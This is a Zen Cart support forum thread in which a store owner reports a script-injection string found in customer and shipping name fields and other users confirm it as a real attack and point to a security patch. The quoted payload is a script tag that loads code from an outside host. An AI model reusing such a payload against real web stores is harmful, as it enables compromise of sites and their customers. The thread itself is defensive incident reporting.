Results 1 to 8 of 8
  1. #1
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Default Possible hacking attempt alert

    We have had one instance in a recent customer order of this string appearing in the customer and shipping address name fields:
    "<script src=//a6x.me/s/3˃˂/script˃". Searching the Web I can find only one other occurrence of this at
    https://elitecollegepapers.blog/i-wa...other/03/2024/
    It looks like that site may also be using Zencart.
    The IPAddress of a6x.me is 172.67.135.15 and the IPAddress the order was made from is 149.28.252.158
    Both addresses are blacklisted on seven servers listed at multirbl.valli.org.
    Any idea if this is a real hacking attempt that could compromise a ZenCart database or just some twerp goofing around?
    Would be grateful for advice.

  2. #2
    Join Date
    Sep 2009
    Location
    Stuart, FL
    Posts
    12,501
    Plugin Contributions
    88

    Default Re: Possible hacking attempt alert

    See this thread: https://www.zen-cart.com/showthread....-v1-5-8-series

    It's a real hacking attempt.

  3. #3
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Default Re: Possible hacking attempt alert

    @lat9 Thank you for the speedy response.

  4. #4
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Default Re: Possible hacking attempt alert

    Installation of the security patch was simple - so thank you for this. Would be nice if the spam_cleanup_check script could also list the actual SPAM accounts, too.

  5. #5
    Join Date
    Mar 2010
    Posts
    52
    Plugin Contributions
    0

    Default Re: Possible hacking attempt alert

    Hi Guys

    I've followed the instructions on https://www.zen-cart.com/showthread....-v1-5-8-series.

    But after I applied the SQL Patch. I run the spam_cleanup_check.php, it still shows "One or more SPAM accounts found, you should change all admin passwords and your admin directory name."

    Is this normal?

    Thanks

  6. #6
    Join Date
    Feb 2006
    Location
    Tampa Bay, Florida
    Posts
    9,704
    Plugin Contributions
    123

    Default Re: Possible hacking attempt alert

    Yes, it means your site was attacked. Go ahead and do what it says and install the updated database.php file patch and you'll be protected.
    That Software Guy. My Store: Zen Cart Modifications
    Available for hire - See my ad in Services
    Plugin Moderator, Documentation Curator, Chief Cook and Bottle-Washer.
    Do you benefit from Zen Cart? Then please support the project.

  7. #7
    Join Date
    Jan 2004
    Posts
    66,373
    Blog Entries
    7
    Plugin Contributions
    274

    Default Re: Possible hacking attempt alert

    Quote Originally Posted by SPython View Post
    Installation of the security patch was simple - so thank you for this. Would be nice if the spam_cleanup_check script could also list the actual SPAM accounts, too.
    You can do an admin search for "FAKE ACCOUNT" and clean up whatever you wish.
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  8. #8
    Join Date
    May 2012
    Posts
    3
    Plugin Contributions
    0

    Default Re: Possible hacking attempt alert

    Does anyone know what they were able to "do" by putting that script tag value in the field? Did they steal information or what is the fallout? I applied the patch and changed url/passwords, so I guess I should now be protected, but I am curious what may have happened during the attack.

 

 

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
disjunctive-egg
Zen-Cart, Internet Selling Services, Klamath Falls, OR